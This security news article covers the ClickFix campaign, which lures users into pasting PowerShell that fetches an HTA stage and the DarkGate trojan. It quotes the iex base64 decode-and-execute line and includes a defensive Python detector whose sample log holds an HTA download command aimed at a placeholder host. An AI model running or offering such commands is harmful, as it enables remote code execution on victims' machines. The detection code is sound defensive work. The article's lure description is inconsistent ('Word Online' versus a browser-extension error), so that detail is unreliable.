A new social engineering scheme, dubbed “ClickFix,” is actively tricking users into installing the sophisticated DarkGate malware by impersonating legitimate “Word Online” error messages. This campaign represents a shift in attack vectors, moving away from automated downloads to a more hands-on approach that leverages user trust in troubleshooting procedures.
Security researchers at Point Wild have identified this elaborate phishing operation. Unlike many prevalent malware distribution methods, ClickFix doesn’t rely on drive-by downloads. Instead, it manipulates victims into manually executing malicious commands, exploiting their desire to resolve perceived technical issues. The primary objective is to deliver DarkGate, a potent remote access trojan known for its ability to grant attackers extensive control over compromised systems.
Technical Analysis of the ClickFix Campaign and DarkGate Malware
The ClickFix attack chain begins when a user visits a compromised or specifically crafted malicious webpage. This page then displays a deceptive notification simulating a missing browser extension error. The fake message prompts the user to click a “How to fix” button, presenting itself as a helpful solution to an apparent technical glitch. However, this button is the gateway to the infection.
Upon clicking the “How to fix” button, a JavaScript function is triggered. This function covertly copies a malicious PowerShell script directly to the user’s clipboard. This clever technique is designed to bypass many standard browser-based security controls, as the malicious code is not automatically downloaded but rather prepared for user-initiated execution.
Point Wild analysts highlighted that this reliance on user interaction significantly hinders automated detection systems. Once the unsuspecting victim pastes the copied command into a PowerShell terminal and executes it, the script proceeds to download a malicious HTA (HTML Application) file from a remote server. This HTA file acts as a crucial intermediate stage.
The HTA file establishes persistence on the victim’s system and prepares it for the deployment of the final payload: DarkGate. DarkGate is a highly versatile remote access trojan (RAT) capable of a wide range of malicious activities, including data theft, espionage, and further malware propagation.
In-Depth Look at the Infection Process
The technical execution of the ClickFix campaign involves several layers of obfuscation to conceal the malicious intent. The initial webpage contains base64-encoded data that is run through a reverse function within the HTML before it is decoded, so its purpose is hard to discern on casual inspection. Once decoded, the data reveals a PowerShell command that flushes the DNS cache and then downloads the next stage of the attack.
```powershell
iex([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64)));
```
This command is responsible for fetching a file named `dark.hta` from a compromised domain. Once executed, the `dark.hta` file creates a new directory on the C: drive. Within this directory, it drops an AutoIt executable and a script named `fckhffh.a3x`. This AutoIt script is critical to the final stage of the infection.
The `fckhffh.a3x` script employs the DES (Data Encryption Standard) algorithm to decrypt the actual DarkGate malware payload. Following successful decryption and deployment, the DarkGate malware establishes communication channels with its command-and-control (C2) servers. This establishes unauthorized remote access for the attackers, effectively completing the system compromise.
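As an added defender-side example (not code from Point Wild's report or the campaign itself), the following Python scans PowerShell command lines, such as those recorded in process-creation logs, for the decode-and-execute pattern shown above: it decodes any long base64 literal (also trying it reversed, so the same routine works on the reversed blob in the page source) and flags the stage-2 indicators the article names. The log lines and the host name are constructed placeholders.

```python
import base64
import binascii
import re

# Constructed sample process-creation command lines (not taken from the report). The
# second mimics ClickFix: a base64 blob that iex() decodes to a DNS-cache flush and an
# HTA download from a placeholder host.
STAGE2 = ("ipconfig /flushdns; Invoke-WebRequest "
          "-Uri 'http://placeholder.example/dark.hta' -OutFile $env:TEMP\\dark.hta")
SAMPLE_LOGS = [
    "powershell.exe Get-ChildItem C:\\Users\\alice\\Documents",
    f"powershell.exe $base64='{base64.b64encode(STAGE2.encode()).decode()}';"
    "iex([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64)));",
]

B64_LITERAL = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
# Stage-2 indicators drawn from the article: DNS flush, HTA fetch, download helpers.
STAGE2_MARKERS = ("flushdns", ".hta", "invoke-webrequest", "downloadstring", "net.webclient")


def decode_candidates(cmd: str) -> list[str]:
    """UTF-8 text of each long base64 literal that decodes cleanly; each is also tried
    reversed, so the routine works on the reversed blob stored in the page source."""
    out = []
    for m in B64_LITERAL.finditer(cmd):
        for blob in (m.group(0), m.group(0)[::-1]):
            try:
                text = base64.b64decode(blob, validate=True).decode("utf-8")
            except (binascii.Error, UnicodeDecodeError):
                continue
            if text.isprintable():
                out.append(text)
    return out


def analyze(cmd: str) -> dict:
    """Flag inline base64 decoding, Invoke-Expression on the result, and stage-2
    indicators inside the decoded text; two or more findings count as suspicious."""
    low = cmd.lower()
    findings = []
    if "frombase64string" in low:
        findings.append("inline base64 decode")
    if re.search(r"\biex\b|invoke-expression", low):
        findings.append("Invoke-Expression on decoded text")
    decoded = decode_candidates(cmd)
    for text in decoded:
        hits = [k for k in STAGE2_MARKERS if k in text.lower()]
        if hits:
            findings.append("decoded payload contains: " + ", ".join(hits))
    return {"decoded": decoded, "findings": findings, "suspicious": len(findings) >= 2}


if __name__ == "__main__":
    for line in SAMPLE_LOGS: print(analyze(line))
```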
The emergence of the ClickFix campaign underscores the evolving tactics of cybercriminals. By leveraging social engineering and user-initiated actions, attackers are finding new ways to circumvent traditional security measures. Users are advised to remain vigilant and exercise extreme caution when encountering unexpected error messages or prompts requesting the execution of commands, especially those involving PowerShell.
The ongoing development and deployment of sophisticated malware like DarkGate, facilitated by campaigns such as ClickFix, pose a significant threat to individuals and organizations alike. Continued research and awareness are crucial to staying ahead of these evolving cyber threats.